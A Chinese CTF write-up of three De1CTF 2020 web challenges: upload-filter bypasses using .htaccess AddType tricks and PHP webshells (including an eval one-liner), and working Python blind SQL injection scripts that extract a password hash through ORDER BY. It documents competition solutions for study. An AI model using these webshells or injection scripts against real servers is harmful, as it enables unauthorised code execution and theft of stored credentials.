De1CTF 2020
1. check in
考点:文件上传黑名单绕过——后缀/内容黑名单都拦 ph,于是上传 .htaccess 让自定义后缀(.wuwu)被 PHP 解析
参考资料:
1、 利用htaccess绕黑名单,mail绕过disable function https://xz.aliyun.com/t/3937
2、.htaccess tricks总结 https://www.cnblogs.com/20175211lyz/p/11741348.html
3、[SUCTF 2019]CheckIn https://www.jianshu.com/p/2907426b4a91
4、各种一句话木马大全 https://blog.csdn.net/l1028386804/article/details/84206143
题目源码:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Cheek in</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" type="text/css" href="style/css/style1.css">
<link rel="stylesheet" type="text/css" href="style/css/style2.css">
</head>
<?php
// Upload handler of the "check in" challenge.  Each gate below is a
// blacklist; the comments mark where the intended solution slips through.
error_reporting(0);
// Per-client directory keyed on the source IP.  REMOTE_ADDR is set by the
// web server, so the directory name itself is not attacker-controlled.
$userdir = "uploads/" . md5($_SERVER["REMOTE_ADDR"]);
$typeAccepted = ["image/jpeg", "image/gif", "image/png"];
if (!file_exists($userdir)) {
mkdir($userdir, 0777, true);
}
if (isset($_POST["upload"])) {
$tmp_name = $_FILES["fileUpload"]["tmp_name"];
$name = $_FILES["fileUpload"]["name"];
// Whole file body is read once so it can be regex-checked below.
$black = file_get_contents($tmp_name);
if (!$tmp_name) {
$result1 ="???";
}else if (!$name) {
$result1 ="filename cannot be empty!";
}
// Filename blacklist: "ph" covers php/phtml/phar, "ml" html/xml, plus js
// and cg(i).  The name ".htaccess" contains none of these fragments.
else if (preg_match("/ph|ml|js|cg/i", $name)) {
$result1 = "filename error";
}
// MIME check trusts the Content-Type the client wrote into the multipart
// part ($_FILES[...]['type']); sending "image/png" is enough to pass it.
else if (!in_array($_FILES["fileUpload"]['type'], $typeAccepted)) {
$result1 = 'filetype error';
}
// Content blacklist.  "ph" forbids a plain "php" token (so the .htaccess
// AddType line is split with a backslash line continuation) and "auto"
// forbids php_value auto_prepend_file; ">" forbids a closing PHP tag, so
// the shell is written with a short open tag and no closing tag.
else if (preg_match("/perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet/i",$black)){
$result1 = "perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet in contents!";
}
else {
// The client-chosen file name is kept verbatim, so ".htaccess" and the
// mapped extension both land in the per-IP directory.
$upload_file_path = $userdir . "/" . $name;
move_uploaded_file($tmp_name, $upload_file_path);
// $userdir is derived from md5(REMOTE_ADDR) only, so no shell
// metacharacters can reach this command line.
system("chmod +x ".$userdir."/*");
$result2= "Your dir : " . $userdir. ' <br>';
$result3= "Your files :" .$name.'<br>';
}
}else{
$result1 = 'upload your file';
}
?>
<body>
<div class="wrap">
<div class="container">
<h1 style="color: white; margin: 0; text-align: center">UPLOADS</h1>
<form action="index.php" method="post" enctype="multipart/form-data">
<input class="wd" type="file" name="fileUpload" id="file"><br>
<input class="wd" type="submit" name="upload" value="submit">
<p class="change_link" style="text-align: center">
<strong><?php print_r($result1);?></strong>
</br>
<strong><?php print_r($result3);?></strong>
</br>
<strong><?php print_r($result2);?></strong>
</p>
</form>
</div>
</div>
</body>
</html>
思路:
文件名黑名单是 /ph|ml|js|cg/i(.php/.phtml/.phar 都含 ph),但不匹配 .htaccess;内容黑名单拦了 ph、auto(封掉 php_value auto_prepend_file)和 >;Content-Type 只校验客户端自报的 $_FILES['type'],改成 image/png 即可。于是上传 .htaccess,用 AddType 把自定义后缀交给 PHP 解析(前提是服务端 AllowOverride 允许 .htaccess),并用行尾反斜杠续行把 php 拆开绕过 ph 过滤:
AddType application/x-httpd-p\
hp .wuwu
一句话木马用短标签 <?= 写,并且不写结束标签 ?>(PHP 文件末尾省略 ?> 是合法的),这样内容里不出现被过滤的 >;文件名取 .wuwu 后缀,不含 ph:
<?=eval($_POST['cmd']);
2. Hard_Pentest_1
考点:文件上传——后缀黑名单(只有 php 一项)与"无字母数字、无分号"内容过滤的绕过
参考资料:
1、【PHP-CTF】无字母无数字webshell https://blog.csdn.net/a15803617402/article/details/83589181
2、一些不包含数字和字母的webshell https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html
3、CTF 中的 PHP 知识汇总 https://www.restran.net/2016/09/26/php-security-notes/
4、https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html
<?php
//Clear the uploads directory every hour
highlight_file(__FILE__);
// Per-client sandbox directory.  The "De1CTF2020" salt means the path
// cannot be computed from the IP alone (presumably to stop other players
// from locating a peer's uploads).  chdir() makes the later
// move_uploaded_file() target relative to the sandbox.
$sandbox = "uploads/". md5("De1CTF2020".$_SERVER['REMOTE_ADDR']);
@mkdir($sandbox);
@chdir($sandbox);
if($_POST["submit"]){
// Size limit is 2 KiB; Check() (below) is the only gate on the file
// name and content, and it runs before the upload error code is looked at.
if (($_FILES["file"]["size"] < 2048) && Check()){
if ($_FILES["file"]["error"] > 0){
die($_FILES["file"]["error"]);
}
else{
// Stored name keeps the client-chosen extension; Check() refuses only
// the literal extension "php", so .phtml and similar are accepted and
// executed if the server maps them to the PHP handler.
$filename=md5($_SERVER['REMOTE_ADDR'])."_".$_FILES["file"]["name"];
move_uploaded_file($_FILES["file"]["tmp_name"], $filename);
echo "save in:" . $sandbox."/" . $filename;
}
}
else{
echo "Not Allow!";
}
}
// Returns true when the upload passes all three blacklist tests:
// extension not "php", content free of the regex class below, name free of "..".
function Check(){
// Only the exact lower-case extension "php" is refused; phtml, phar,
// php5, PHP etc. are not in the list.
$BlackExts = array("php");
// Extension = text after the last dot, trimmed.
$ext = explode(".", $_FILES["file"]["name"]);
$exts = trim(end($ext));
$file_content = file_get_contents($_FILES["file"]["tmp_name"]);
// Content may contain no ASCII letter or digit (the /i flag makes [a-z]
// match upper case too) and none of ; ~ ^ ` & | -- the usual not/xor/
// backtick building blocks of alphanumeric-free webshells.  The pattern
// has no /u flag, so bytes above 0x7f are never matched.
if(!preg_match('/[a-z0-9;~^`&|]/is',$file_content) &&
!in_array($exts, $BlackExts) &&
!preg_match('/\.\./',$_FILES["file"]["name"])) {
return true;
}
return false;
}
?>
<html>
<head>
<meta charset="utf-8">
<title>upload</title>
</head>
<body>
<form action="index.php" method="post" enctype="multipart/form-data">
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="submit">
</form>
</body>
</html>
思路:
很恶心:Check() 的内容正则 /[a-z0-9;~^`&|]/is 把字母、数字(/i 不区分大小写)、分号以及 ~ ^ ` & | 全部禁掉,常规的取反、异或无字母数字 webshell 都不能直接用;但正则没有 /u,非 ASCII 字节不会被匹配,所以上传由不可见/高位字节构造的无字母数字一句话(参考资料 1、2、4 的思路,例如自增构造),且整份文件只写一条语句、不带分号。
文件名后缀黑名单只有 php 一项,改用 .phtml 绕过(Apache 的 PHP 处理器配置通常也匹配 phtml)。
3. Mixture
链接:
考点:order by 位置的 SQL 注入(无法回显,用排序结果的变化做布尔盲注)
参考资料:
1、https://forum.90sec.com/t/topic/296
exp:
import requests
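TARGET = "http://49.51.251.99"
# Credentials and session cookie recorded from the original run.  The CTF
# instance is gone; they only document that member.php needed a logged-in
# session.  Replace both before reusing the script against anything else.
LOGIN_DATA = {
    "username": "xxxxx",
    "password": "xxxxxxx",
    "submit": "submit",
}
COOKIE = {"PHPSESSID": "sou26piclav6f99h79k1l5vmbn"}
# Alphabet tried at each position; the target value is an md5 hex digest.
CHARSET = "0123456789abcdefghijklmnopqrstuvwxyz,"


def build_payload(pos, ch):
    """Return the ORDER BY injection probing whether character *pos*
    (1-based) of member.password equals *ch*.

    The text is appended to whatever column member.php sorts by, giving
    ``orderby=<col>|(mid(...)='c')+1``: the comparison yields 0 or 1, so
    the sort key differs between the two outcomes and the rendered row
    order changes.  ``%2b`` is an encoded ``+`` so the server decodes a
    literal plus sign rather than a space.
    """
    return "|(mid((select password from member),{},1)='{}')%2b1".format(pos, ch)


def ordering_flipped(body, first="tom", second="1000000"):
    """Return True when *first* appears before *second* in *body*.

    The oracle of the original script compared ``str.index`` results
    directly, which raised ValueError whenever a marker was missing (for
    example on an error page).  A missing marker now counts as "condition
    false" so the brute force continues instead of aborting.
    """
    i, j = body.find(first), body.find(second)
    if i < 0 or j < 0:
        return False
    return i < j


def leak_password(session_cookie, length=32, charset=CHARSET, fetch=None):
    """Recover *length* characters of member.password, one position at a time.

    *fetch* takes a full URL and returns the response body as text; it is
    injectable so the search logic can run without network access.  A
    position for which no character in *charset* matches is skipped, as in
    the original loop, so the result may be shorter than *length*.
    """
    if fetch is None:
        def fetch(full_url):
            # .text rather than .content: the markers are compared as str.
            return requests.get(full_url, cookies=session_cookie).text
    base = TARGET + "/member.php?orderby="
    found = ""
    for pos in range(1, length + 1):
        for ch in charset:
            payload = build_payload(pos, ch)
            if ordering_flipped(fetch(base + payload)):
                print(payload + " ok")
                found += ch
                print(found)
                break
            print(payload)
    return found


def main():
    # Log in first so the session behind COOKIE is an authenticated member.
    requests.post(TARGET + "/index.php", data=LOGIN_DATA, cookies=COOKIE)
    print(leak_password(COOKIE))


if __name__ == "__main__":
    main()
# Value recovered during the CTF: 18a960a3a0b3554b314ebe77fe545c85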
import requests
from urllib import parse
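TARGET = "http://134.175.185.244/member.php"
# Session cookie from the original run; the instance no longer exists, so
# this only records that member.php required an authenticated session.
COOKIES = {"PHPSESSID": "nit7d8990st0kdk4q5b5d91528"}

# Enumeration chain that led to the final query, kept for reference
# (each one was swapped into PASSWORD_PAYLOAD's place in turn):
#   database name:
#     (select case when (ascii(substring((select database()) from {} for 1))>{}) then 1 else 2 end)
#   table names in the current database:
#     (select case when (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = database()),{},1))>{}) then 1 else 2 end)
#   columns of `users` (0x7573657273) and `member` (0x6d656d626572):
#     (select case when (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 0x7573657273),{},1))>{}) then 1 else 2 end)
#     (select case when (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 0x6d656d626572),{},1))>{}) then 1 else 2 end)
PASSWORD_PAYLOAD = (
    "(select case when (ascii(substr((select password from member),{},1))>{})"
    " then 1 else 2 end)"
)
# Value recovered during the CTF: 18a960a3a0b3554b314ebe77fe545c85


def build_payload(pos, threshold, template=PASSWORD_PAYLOAD):
    """Return the URL-encoded ORDER BY expression for one oracle probe.

    The expression sorts by 1 when the byte at 1-based position *pos* of
    the targeted value has an ASCII code greater than *threshold*, and by
    2 otherwise; the resulting change in row order is the only feedback
    channel.  quote() keeps spaces and parentheses intact in the query.
    """
    return parse.quote(template.format(pos, threshold))


def leak_char(pos, baseline, fetch, low=32, high=127):
    """Binary-search the byte at *pos* within [low, high].

    *fetch(payload)* returns the response body for one probe.  Following
    the original script, a body equal to *baseline* (the page fetched with
    no orderby parameter) is read as "greater than threshold".  If no
    threshold is ever exceeded -- e.g. past the end of the value, where
    ascii('') is 0 -- the search converges on chr(low).
    """
    while high > low:
        mid = (high + low) // 2
        if fetch(build_payload(pos, mid)) == baseline:
            low = mid + 1
        else:
            high = mid
    return chr(low)


def leak_value(baseline, fetch, length=126):
    """Recover *length* bytes, printing the partial result after each one.

    The original probed positions 1..126 regardless of the value's real
    length, so positions past the end come back as chr(32) padding.
    """
    result = ""
    for pos in range(1, length + 1):
        result += leak_char(pos, baseline, fetch)
        print(result)
    return result


def main():
    def fetch(payload):
        return requests.get(TARGET + "?orderby=|" + payload, cookies=COOKIES).content

    # The unmodified page is the comparison baseline; fetch it once rather
    # than once per probe as the original did (halves the request count).
    baseline = requests.get(TARGET, cookies=COOKIES).content
    leak_value(baseline, fetch)


if __name__ == "__main__":
    main()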